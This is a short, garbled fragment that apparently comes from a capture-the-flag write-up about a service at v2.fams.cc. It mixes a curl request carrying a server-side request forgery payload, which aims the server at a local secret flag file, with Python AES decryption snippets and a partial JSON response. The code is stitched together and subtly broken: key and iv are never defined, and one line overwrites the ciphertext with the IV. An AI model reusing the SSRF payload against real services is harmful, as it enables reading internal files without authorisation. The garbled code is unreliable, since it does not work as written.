V2.fams.cc <2024>

#!/usr/bin/env python3 import sys, hashlib, binascii from Crypto.Cipher import AES

cipher = AES.new(key, AES.MODE_CBC, iv) pt = cipher.decrypt(ct) v2.fams.cc

curl -s -X POST http://v2.fams.cc/encrypt \ -d "url=http://127.0.0.1:8000/secret/flag.txt&key=ssrf" \ -o response.json Result ( response.json ): #!/usr/bin/env python3 import sys

# Load encrypted file data = open('enc.bin','rb').read() iv, ct = data[:16], data[16:] ct = data[:16]

"download": "http://v2.fams.cc/download/7a9c3d", "used_key": "8c3c5d1e2f4a6b7c9d0e1f2a3b4c5d6e"